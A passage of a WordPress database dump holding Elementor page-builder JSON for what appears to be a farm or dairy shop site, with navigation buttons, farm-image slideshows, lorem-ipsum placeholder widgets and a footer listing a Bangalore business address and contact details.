e\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"14a6bb1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"785d463\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#E1D7D74F\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5ccfaed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8e25cb7\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"f4996be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6f2a1f5\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"24f8373\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3cd3a5c\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"dc5078a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0324abe\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8894,1531,'_elementor_page_assets','a:0:{}'),(8896,1532,'_elementor_edit_mode','builder'),(8897,1532,'_elementor_template_type','wp-page'),(8898,1532,'_elementor_version','3.7.8'),(8899,1532,'_wp_page_template','elementor_canvas'),(8900,1532,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"14a6bb1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"785d463\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#E1D7D74F\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5ccfaed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8e25cb7\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is 